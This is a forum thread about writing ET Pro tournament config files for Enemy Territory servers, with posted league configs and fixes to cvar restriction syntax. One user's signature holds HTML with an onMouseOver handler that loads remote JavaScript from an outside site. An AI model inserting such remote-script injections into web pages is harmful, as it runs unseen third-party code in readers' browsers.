pluggable tournament config file format

ET Pro Documentation Project

Moderators: Forum moderators, developers, ET Pro Documentation

Post Reply
[KuB]FraGiLe
Posts: 62
Joined: Sun Feb 15, 2004 3:47 am

Post by [KuB]FraGiLe »

Hi,
i made a little .config file for the leauge we will be playing in. First I did it with pb_sv_cvars and everything worked fine. Now i switched to sv_cvar and it looks like this :

Code: Select all

configname ETLIGA
init
{ 
setl b_defaultskills ""
setl b_noskillupgrades 0
setl b_banners 0
setl b_shove 0
setl b_shove_noz 0
setl b_statsaver 1
setl b_intermissiontime 20
setl b_match_warmupjoin 0
setl b_xpstopwatch 0 
setl b_multiview 1
setl b_levels_battlesense "" 
setl b_levels_engineer "" 
setl b_levels_medic "" 
setl b_levels_fieldops "" 
setl b_levels_lightweapons "" 
setl b_levels_soldier "-1 -1 90 140"
setl b_levels_covertops "" 
setl b_riflegrenades 1
setl b_stickycharge 1 
setl b_forceLimboHealth -113
setl b_packDistance 1.5
setl b_spectator 3
setl b_XPSave 1
setl b_weaponLimits 1
setl b_headshot 0
setl b_anticheat 1
setl b_cheatlog "cheats.log"

setl sv_maxPing 400
setl sv_minPing 0
setl g_gametype 3
setl g_antilag 1


setl sv_zombietime 1
setl sv_privateclients 0
setl g_syncronousclients 0
setl g_friendlyFire 1
setl g_warmup 20
setl g_do_warmup 1
setl g_inactivity 180

setl g_gravity 800
setl g_speed 320
setl pmove_fixed 0
setl pmove_msec 8
setl g_needpass 1
setl g_spectatorinactivity 0
setl g_landminetimeout 1
setl g_heavyWeaponRestriction 20

setl match_latejoin 1 
set match_minplayers 4 
setl match_mutespecs 0 
setl match_timeoutcount 2 
setl match_timeoutlength 30
setl match_warmupdamage 2
setl vote_allow_antilag 0
setl vote_allow_referee 1
setl vote_allow_pub 0
setl vote_allow_comp 1
setl vote_allow_friendlyfire 0
setl team_maxplayers 6

setl match_readypercent 100
setl team_maxPanzers 1
setl team_maxMortars 1 
setl team_maxFlamers 1 
setl team_maxMg42s 1 
setl team_maxPanzers 1 
setl team_maxMines 10 


command "pb_sv_enable" 
command "pb_sv_cvarempty" 
command "pb_sv_kicklen 0" 
command "pb_sv_cvarlogging 2" 
command "pb_sv_autoss 1" 
command "pb_sv_ssfloor 1" 
command "pb_sv_ssSrate 1" 
command "pb_sv_cvarwalk 4" 
command "pb_sv_ssdelay 15" 
command "pb_sv_cvaruserpulse 15" 
command "pb_sv_cvarchangedpulse 15" 
command "pb_sv_ssxpct 50" 
command "pb_sv_ssypct 50" 
command "pb_sv_ssheight 240" 
command "pb_sv_autossfrom 300" 
command "pb_sv_sswidth 320" 
command "pb_sv_ssceiling 500" 
command "pb_sv_autossto 1200" 

command "sv_enable" 
command "sv_cvarempty" 
command "sv_kicklen 0"
command "sv_cvar cg_autoAction EQ 7"
command "sv_cvar cg_bobup IN 0 0.005"
command "sv_cvar cg_bobpitch IN 0 0.002"
command " sv_cvar cg_bobroll IN 0 0.002"
command "sv_cvar cg_bobyaw IN 0 0.002"
command "sv_cvar cg_fov IN 90 120"
command "sv_cvar cg_shadows IN 0 1"
command "sv_cvar cg_thirdperson EQ 0"
command "sv_cvar cl_freelook EQ 1"
command "sv_cvar cl_maxpackets IN 30 100"
command "sv_cvar cl_timenudge EQ 0"
command "sv_cvar com_maxfps OUT 0.000001 40"
command "sv_cvar m_pitch OUT -0.015 0.015"
command "sv_cvar m_yaw EQ 0.022"
command "sv_cvar rate IN 7000 25000"
command "sv_cvar r_allowextensions EQ 1"
command "sv_cvar r_ati_fsaa_samples EQ 0"
command "sv_cvar r_ati_truform_tess EQ 0"
command "sv_cvar r_drawentities EQ 1"
command "sv_cvar r_DrawFoliage EQ 1"
command "sv_cvar r_ext_ATI_pntriangles EQ 0"
command "sv_cvar r_ext_NV_fog_dist EQ 0"
command "sv_cvar r_ext_texture_filter_anisotropic EQ 0"
command "sv_cvar r_flares in 0 1"
command "sv_cvar r_gamma in 1 3"
command "sv_cvar r_intensity in 1 1.5"
command "sv_cvar r_lightmap EQ 0"
command "sv_cvar r_mapoverbrightbits IN 0 3"
command "sv_cvar r_overbrightbits IN 0 3"
command "sv_cvar r_picmip IN 0 3"
command "sv_cvar r_picmip2 IN 0 3"
command "sv_cvar r_rmse EQ 0"
command "sv_cvar r_showmodelbounds EQ 0"
command "sv_cvar r_shownormals EQ 0"
command "sv_cvar r_showtris EQ 0"
command "sv_cvar r_uifullscreen EQ 0"
command "sv_cvar r_wolffog EQ 1"
command "sv_cvar snaps in 20 40"
command "sv_cvar r_nv_fogdist_mode INCLUDE NV GL_EYE_RADIAL_NV"
command "sv_cvar r_primitives IN 0 2"
command "sv_cvar cg_errordecay IN 100"

} 
map default 
{ 
setl b_mapscriptdirectory "etpromapscripts" 
setl g_userTimeLimit 0 
setl b_moverscale 1.0 
setl g_useralliedrespawntime 0 
setl g_useraxisrespawntime 0 

} 
map fueldump 
{ 
setl g_userTimeLimit 20 
setl b_moverscale 1.5 
} 
map radar 
{ 
setl g_userTimeLimit 15 
setl b_moverscale 1.0 
} 
map battery 
{ 
setl g_userTimeLimit 15 
setl b_moverscale 1.0 
} 
map goldrush 
{ 
setl g_userTimeLimit 25 
setl b_moverscale 1.0 
} 
map oasis 
{ 
setl g_userTimeLimit 20 
setl b_moverscale 1.0 
} 
map railgun 
{ 
setl g_userTimeLimit 15 
setl b_moverscale 1.0 
} 
map tc_base
{
setl g_userTimeLimit 15
setl b_moverscale 1.0
}
Now the server crashes when i load this config, can u tell whats wrong with it ? I only changed the pb_sv_cvars to sv_cvars and added the map tc_base section at the end...
User avatar
bani
Site Admin
Posts: 2780
Joined: Sun Jul 21, 2002 3:58 am
Contact:

Post by bani »

command "sv_cvar cg_errordecay IN 100"

IN takes 2 parameters with sv_cvar ...
BOTA
Posts: 136
Joined: Wed Oct 23, 2002 3:53 am

Post by BOTA »

Yes you have to watch that.
It is not as simple as changing pb_sv_cvar to sv_cvar
I had that problem too, now I pay attention and use it properly.
[FAC]-FRAGile-NL
Posts: 10
Joined: Tue Sep 09, 2003 1:39 pm

Post by [FAC]-FRAGile-NL »

Does anyone know a command to check the etpro cvars on the client side? I know I can get a list of all cvars by using sv_cvarlist on the server. But I would like to get a list on the client too (like pb_cvarlist did for PB), so I can check the config of a server.
User avatar
Rain
Posts: 635
Joined: Sat Aug 02, 2003 3:44 pm
Location: Muffin Laboratories
Contact:

Post by Rain »

You can use b_cvarlist since about test13.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
[KuB]FraGiLe
Posts: 62
Joined: Sun Feb 15, 2004 3:47 am

Post by [KuB]FraGiLe »

Thx 4 support config worx now . Greetings to my brother in name from the Netherlands btw :D
[FAC]-FRAGile-NL
Posts: 10
Joined: Tue Sep 09, 2003 1:39 pm

Post by [FAC]-FRAGile-NL »

FRAGile hugs FraGiLe :lol:
kilgore
Posts: 5
Joined: Sun Mar 21, 2004 12:13 pm

Post by kilgore »

Well i have a major problem with setting the new CB settings on my cln server. I have upgraded ETpro to 3.0.0 added the testbugfix15, the clanwar.cfg is in the configs directory... but still it seems that sth is wrong

PELASE HELP ME, Im about to have some CB matches soon and need to have everything set right:
these are my settings:
// server settings
set fs_game etpro
set g_MinGameClients "0"
set sv_allowanonymous 0
set sv_allowdownload 1
set sv_pure 1
set sv_maxclients 14
set sv_minping 0
set sv_floodprotect 1
set sv_maxping 0
set sv_minrate 2500
set sv_maxrate 25000
set sv_privateclients 0
set sv_reconnectlimit 3
set sv_timeout 120

// game settings
set g_heavyWeaponRestriction "100"
set g_antilag "1"
set g_altStopwatchMode "0"
set g_autofireteams "1"
set g_complaintlimit "5"
set g_ipcomplaintlimit "3"
set g_fastres "0"
set g_friendlyFire "1"
set g_maxlives "0"
set g_alliedmaxlives "0"
set g_axismaxlives "0"
set g_teamforcebalance "1"
set g_noTeamSwitching "0"
set g_voiceChatsAllowed "4"
set g_doWarmup "0"
set g_warmup "30"
set g_spectatorInactivity "0"

set match_latejoin "1"
set match_minplayers "4"
set match_mutespecs "0"
set match_readypercent "100"
set match_timeoutcount "0"
set match_warmupDamage "1"
set team_maxplayers "0"
set team_nocontrols "1"
set pmove_fixed "0"
set pmove_msec "8"

// LMS ONLY SETTINGS
set g_lms_teamForceBalance "1"
set g_lms_roundlimit "3"
set g_lms_matchlimit "2"
set g_lms_currentMatch "0"
set g_lms_lockTeams "0"
set g_lms_followTeamOnly "1"

// VOTING
set g_allowVote "1"
set vote_limit "10"
set vote_percent "51"
set vote_allow_comp "1"
set vote_allow_gametype "1"
set vote_allow_kick "1"
set vote_allow_map "1"
set vote_allow_matchreset "1"
set vote_allow_mutespecs "1"
set vote_allow_nextmap "1"
set vote_allow_pub "1"
set vote_allow_referee "0"
set vote_allow_shuffleteams "1"
set vote_allow_swapteams "1"
set vote_allow_friendlyfire "1"
set vote_allow_config "clanwar"
set vote_allow_timelimit "0"
set vote_allow_warmupdamage "0"
set vote_allow_antilag "1"
set vote_allow_balancedteams "1"
set vote_allow_muting "1"

// punkbuster
pb_sv_enable
pb_sv_cvarempty
pb_sv_cvar cl_maxpackets in 30 100
pb_sv_cvar cl_timenudge in -50 0
pb_sv_cvar rate in 2500 25000
pb_sv_cvar snaps in 20 40
pb_sv_cvar r_picmip in 0 5
pb_sv_cvar r_picmip2 in 0 5
pb_sv_cvar r_mapoverbrightbits in 0 4
pb_sv_cvar r_overbrightbits in 0 4
pb_sv_cvar r_uifullscreen in 0
pb_sv_cvar r_ext_NV_fog_dist in 0
pb_sv_cvar com_maxfps out 0.00001 40
pb_sv_cvar cg_bobup in 0 0.005
pb_sv_cvar cg_bobpitch in 0 0.002
pb_sv_cvar cg_bobroll in 0 0.002
pb_sv_cvar r_rmse in 0.0 0.1

// ClanBase

config clanwar.cfg


// LOGGING

set g_log "etserver.log" // Game logging
set g_logsync 0
set logfile 2 // Console logging ( 1: enable 2:enable and sync )

// MAP ROTATION

exec campaigncycle.cfg // Campaign mode
//exec objectivecycle.cfg // Objective mode
//exec lmscycle.cfg // Last Man Standing mode

// WATCHDOG
// in case the game dies with an ERR_DROP
// or any situation leading to server running with no map
//set com_watchdog 10 // defaults 60
set com_watchdog_cmd "exec campaigncycle.cfg" // defaults to quit



and clanwar.cfg
configname ClanBase^7&^3rtcw.no
init
{
setl g_gametype 3
setl g_warmup 15
setl g_doWarmup 1
setl g_voiceChatsAllowed 99
setl g_spectatorInactivity 0
setl g_antilag 0
setl g_friendlyFire 1
setl g_heavyWeaponRestriction 20
setl g_medicChargeTime 45000
setl g_LTChargeTime 40000
setl g_engineerChargeTime 30000
setl g_soldierChargeTime 20000
setl g_covertopschargetime 30000
setl g_landminetimeout 0
setl team_maxMortars 1
setl team_maxFlamers 1
setl team_maxMg42s 1
setl team_maxPanzers 1
setl team_maxMines 7
setl team_maxplayers 0
setl team_nocontrols 0
setl match_timeoutcount 2
setl match_timeoutlength 240
setl match_minplayers 2
setl match_latejoin 1
setl match_mutespecs 0
setl match_readypercent 100
setl match_warmupDamage 2
setl sv_pure 1
setl sv_minping 0
setl sv_maxping 0

setl g_allowVote 1
setl vote_limit 99
setl vote_percent 51
setl vote_allow_balancedteams 0
setl vote_allow_muting 1
setl vote_allow_swapteams 1
setl vote_allow_friendlyfire 0
setl vote_allow_timelimit 1
setl vote_allow_warmupdamage 1
setl vote_allow_kick 1
setl vote_allow_map 1
setl vote_allow_matchreset 1
setl vote_allow_mutespecs 1
setl vote_allow_nextmap 1
setl vote_allow_referee 1
setl vote_allow_config "clanwar esl"
setl vote_allow_comp 0
setl vote_allow_gametype 0
setl vote_allow_pub 0
setl vote_allow_shuffleteams 0
setl vote_allow_antilag 0

setl b_mapscriptdirectory etpromapscripts

setl b_levels_battlesense "20 90 140"
setl b_levels_engineer "20 90 140"
setl b_levels_medic "20 90 140"
setl b_levels_fieldops "20 140"
setl b_levels_lightweapons "20 90 140"
setl b_levels_soldier "140"
setl b_levels_covertops "20 90 140"
setl b_statsaver 1
setl b_intermissiontime 20
setl b_privatemessages 0
setl b_match_warmupjoin 0
setl b_xpstopwatch 0
setl b_multiview 1
setl b_spectatornames 1
setl b_defaultskills ""
setl b_noskillupgrades 0
setl b_shove 0
setl b_stickycharge 1
setl b_damagexp 1
setl b_allowlandminehax 0

command "pb_sv_enable"
command "pb_sv_kicklen 1"
command "sv_cvarempty"
command "sv_cvar cl_freelook EQ 1"
command "sv_cvar cl_maxpackets IN 30 100"
command "sv_cvar cl_timenudge EQ 0"
command "sv_cvar rate IN 7000 25000"
command "sv_cvar snaps IN 20 40"
command "sv_cvar cg_bobup IN 0 0.005"
command "sv_cvar cg_fov IN 90 120"
command "sv_cvar cg_shadows IN 0 1"
command "sv_cvar cg_thirdperson EQ 0"
command "sv_cvar com_maxfps GE 40"
command "sv_cvar m_pitch OUT -0.015 0.015"
command "sv_cvar m_yaw EQ 0.022"
command "sv_cvar r_allowextensions EQ 1"
command "sv_cvar r_ati_fsaa_samples EQ 0"
command "sv_cvar r_ati_truform_tess EQ 0"
command "sv_cvar r_drawentities EQ 1"
command "sv_cvar r_drawfoliage EQ 1"
command "sv_cvar r_ext_ATI_pntriangles EQ 0"
command "sv_cvar r_ext_texture_filter_anisotropic EQ 0"
command "sv_cvar r_flares IN 0 1"
command "sv_cvar r_gamma IN 1 3"
command "sv_cvar r_picmip IN 0 3"
command "sv_cvar r_intensity IN 1 1.5"
command "sv_cvar r_lightmap EQ 0"
command "sv_cvar r_mapoverbrightbits IN 0 3"
command "sv_cvar r_overbrightbits IN 0 1"
command "sv_cvar r_showtris EQ 0"
command "sv_cvar r_showmodelbounds EQ 0"
command "sv_cvar r_shownormals EQ 0"
command "sv_cvar r_wolffog EQ 1"
command "sv_cvar r_primitives IN 0 2"
command "pb_sv_cvar r_nv_fogdist_mode INCLUDE NV"
}
map default
{
set g_userTimeLimit 0
set g_useralliedrespawntime 0
set g_useraxisrespawntime 0
setl b_moverscale 1
}
map fueldump
{
set g_userTimeLimit 20
setl b_moverscale 1.5
}
map radar
{
set g_userTimeLimit 15
}
map battery
{
set g_userTimeLimit 15
}
map goldrush
{
set g_userTimeLimit 20
setl b_moverscale 1.5
}
map oasis
{
set g_userTimeLimit 20
}
map railgun
{
set g_useralliedrespawntime 30
set g_userTimeLimit 15
setl b_moverscale 1
}
map caen
{
set g_useralliedrespawntime 30
set g_userTimeLimit 20
setl b_moverscale 1.5
}
I know that probably my cfg is lame but Im not a full time admin like most of U :oops: i prefer to play... but somebody always have to do it.... PLEASE HELP ME
User avatar
Frag_Master
Posts: 28
Joined: Sat Apr 03, 2004 8:06 am
Location: London, UK
Contact:

Post by Frag_Master »

The problem is that you do not specify in your server.cfg where the configs directory is located. This is done by entering the following:

Code: Select all

set b_mapconfigdirectory "configs"

Also i noticed that you haven't set any ET Pro settings on your server! Did you realise that?


Mike
Last edited by Frag_Master on Sat Apr 03, 2004 8:31 am, edited 1 time in total.
User avatar
Lagger
Posts: 316
Joined: Mon Sep 29, 2003 8:30 am

Post by Lagger »

kilgore, the config files have the extension ".config" not ".cfg" and should be placed in the configs dir.

additionally you are restricting cvars with both etpro and punkbuster. i suggest you remove all the pb_sv_cvar lines.

Code: Select all

config clanwar
...
exec campaigncycle.cfg
should be replaced with

Code: Select all

map oasis
config clanwar
User avatar
Palbin
Posts: 103
Joined: Tue Oct 07, 2003 2:53 pm

Post by Palbin »

Frag_Master wrote:The problem is that you do not specify in your server.cfg where the configs directory is located. This is done by entering the following:

Code: Select all

set b_mapconfigdirectory "configs"

Also i noticed that you haven't set any ET Pro settings on your server! Did you realise that?


Mike
You don't need to set this to anything. Just leave it at ""
Palbin-OGL
www.metamule.com
OGL Admin ET Campaign & SW Ladder / [url=irc://irc.gamesurge.net/ogl]#OGL[/url] / www.worldogl.com
User avatar
KingJackaL
Posts: 666
Joined: Thu Jan 08, 2004 3:47 pm
Location: ChCh, NZ
Contact:

Post by KingJackaL »

Palbin wrote:

Code: Select all

        ...
        command "sv_cvar m_pitch out -0.015 0.015" 
        command "sv_cvar m_yaw out -0.022 0.022"         
        ...
I'm not SURE about this, but shouldn't m_pitch be OUT, and m_yaw be IN, otherwise m_yaw can be set really high ( and sense low ) and it'll have the same effect as lower m_pitch... at least I think that's how it works ( pitch is vert, yaw is horiz - both mouse sens mod's ). :?

Well, now with added b_cvar's for up to test20:

Code: Select all

configname MGL
init
&#123;
        setl g_gametype 3
        set  g_minGameClients 2
        setl g_heavyWeaponRestriction 35
        setl g_antilag 1
        setl g_altStopwatchMode 0
        setl g_autofireteams 0
        setl g_complaintlimit 0
        setl g_ipcomplaintlimit 0
        setl g_fastres 0
        setl g_friendlyFire 1
        setl g_maxlives 0
        setl g_alliedmaxlives 0
        setl g_axismaxlives 0
        setl g_teamforcebalance 0
        setl g_noTeamSwitching 1
        setl g_voiceChatsAllowed 99
        setl g_doWarmup 1
        setl g_warmup 20
        setl g_spectatorInactivity 0
        setl g_speed 320
        setl g_gravity 800
        setl g_knockback 1000

        setl g_medicChargeTime 45000
        setl g_engineerChargeTime 30000
        setl g_LTChargeTime 40000
        setl g_soldierChargeTime 20000
        setl g_covertopsChargeTime 30000

        set  logfile "3"
        set  g_log MGL-match.log

        set  sv_privateclients  0
        setl sv_maxRate 20000
        setl sv_dl_maxRate 0
        setl sv_allowDownload 1
        setl sv_floodProtect 0
        setl sv_pure 1
        setl sv_fps 20
        setl sv_minping 0
        setl sv_maxping 0

        setl team_maxMortars 2
        setl team_maxFlamers 2
        setl team_maxMg42s 2
        setl team_maxPanzers 2
        setl team_maxplayers 6
        setl team_nocontrols 0

        setl match_latejoin 1
        setl match_minplayers 10
        setl match_mutespecs 0
        setl match_readypercent 100
        setl match_timeoutcount 2
        setl match_timeoutlength 180
        setl match_warmupDamage 2

        setl pmove_fixed 0
        setl pmove_msec 8

        setl g_allowVote 1
        setl vote_limit 99
        setl vote_percent 50
        setl vote_allow_comp 0
        setl vote_allow_gametype 0
        setl vote_allow_kick 1
        setl vote_allow_map 1
        setl vote_allow_matchreset 1
        setl vote_allow_mutespecs 1
        setl vote_allow_nextmap 0
        setl vote_allow_pub 0
        setl vote_allow_referee 1
        setl vote_allow_shuffleteams 0
        setl vote_allow_swapteams 1
        setl vote_allow_friendlyfire 0
        setl vote_allow_timelimit 1
        setl vote_allow_warmupdamage 1
        setl vote_allow_antilag 0
        setl vote_allow_balancedteams 0
        setl vote_allow_muting 1

        setl b_antiwarp 1
        setl b_banners 0
        setl b_cursefilteraction 1
        setl b_customVoiceChat 1
        setl b_damagexp 0
        setl b_floodMaxCommands 6
        setl b_headshot 0
        setl b_intreadypercent 70
        setl b_intermissiontime 40
        setl b_match_warmupjoin 0
        set  b_multiview 1
        setl b_noskillupgrades 0
        setl b_panzerlevelup 1
        setl b_privatemessages 3
        setl b_riflegrenades 1
        setl b_shove 0
        setl b_shove_noz 0
        setl b_spectatornames 1
        setl b_statsaver 1
        setl b_stickycharge 1
        setl b_xpstopwatch 0

        set  b_watermark "mglet/mglet"
        set  b_watermarkFadeAfter 40
        set  b_watermarkFadeTime 5

        setl b_defaultskills ""
        setl b_levels_battlesense "15, 40, 70, 120"
        setl b_levels_engineer "20, 40, 80, 140"
        setl b_levels_medic "25, 50, 90, 160"
        setl b_levels_fieldops "25, 80, 160, 160"
        setl b_levels_lightweapons "20, 45, 80, 120"
        setl b_levels_soldier "45, 45, 80, 140"
        setl b_levels_covertops "15, 30, 50, 70"

        setl b_mapscriptdirectory "etpromapscripts"
        setl b_mapconfigdirectory ""
        
        set  b_anticheat 1
        setl b_cheatkicktime -1
        set  b_cheatlog "MGL-cheats.log"
        
        command "pb_sv_enable"
        command "sv_cvarempty"
        command "pb_sv_cvarempty"
        command "pb_sv_kicklen 1"

        command "sv_cvar cg_bobup in -0.005 0.005"
        command "sv_cvar cg_fov in 90 120"
        command "sv_cvar cg_shadows in 0 1"
        command "sv_cvar cg_errordecay eq 100"
        command "sv_cvar cl_timenudge eq 0"
        command "sv_cvar cl_freelook eq 1"
        command "sv_cvar cl_maxpackets in 25 100"
        command "sv_cvar m_pitch out -0.015 0.015"
        command "sv_cvar m_yaw in -0.022 0.022"
        command "sv_cvar r_flares in 0 1"
        command "sv_cvar r_clampToEdge EQ 1"
        command "sv_cvar r_primitives IN 0 2"
        command "sv_cvar snaps in 20 40"
        command "sv_cvar rate in 4000 25000"
        command "sv_cvar r_nv_fogdist_mode INCLUDE NV GL_EYE_RADIAL_NV"
&#125;
map default
&#123;
        setl g_userTimeLimit 20
        command "forcecvar r_drawfoliage 1"
        setl b_moverscale 1.5
        setl team_maxmines 7
&#125;
map fueldump
&#123;
        setl g_useraxisrespawntime 35
&#125;
map radar
&#123;
        command "forcecvar r_drawfoliage 0"
&#125;
map caen
&#123;
        setl g_useralliedrespawntime 30
        setl g_useraxisrespawntime 20
&#125;
map frostbite
&#123;
        setl g_useralliedrespawntime 20
        setl g_useraxisrespawntime 25
&#125;
map mml_church_et_v1
&#123;
        setl g_useralliedrespawntime 30
        setl g_useraxisrespawntime 20
&#125;
map password2
&#123;
        setl g_useralliedrespawntime 20
        setl g_useraxisrespawntime 25
&#125;
map tc_base
&#123;
        setl team_maxmines 0
&#125;
I'll replace the old version here:
http://www.mgleague.co.nz/files/MGL.config
...if no problems are found with that .config
User avatar
Palbin
Posts: 103
Joined: Tue Oct 07, 2003 2:53 pm

Post by Palbin »

KingJackaL wrote:
Palbin wrote:

Code: Select all

        ...
        command "sv_cvar m_pitch out -0.015 0.015" 
        command "sv_cvar m_yaw out -0.022 0.022"         
        ...
I'm not SURE about this, but shouldn't m_pitch be OUT, and m_yaw be IN, otherwise m_yaw can be set really high ( and sense low ) and it'll have the same effect as lower m_pitch... at least I think that's how it works ( pitch is vert, yaw is horiz - both mouse sens mod's ). :?
You are correct. I will change my stuff
Palbin-OGL
www.metamule.com
OGL Admin ET Campaign & SW Ladder / [url=irc://irc.gamesurge.net/ogl]#OGL[/url] / www.worldogl.com
User avatar
bani
Site Admin
Posts: 2780
Joined: Sun Jul 21, 2002 3:58 am
Contact:

Post by bani »

leagues should probably have this in their configs:

setl sv_cheats 0 :lol:

i noticed clanbase was missing it.

there has been at least one match dispute over sv_cheats setting.
User avatar
bani
Site Admin
Posts: 2780
Joined: Sun Jul 21, 2002 3:58 am
Contact:

Post by bani »

and btw, in 3.0.1 the server g_antilag setting does nothing at all, so you can remove it from the configs. antilag is entirely an individual client decision now.
Post Reply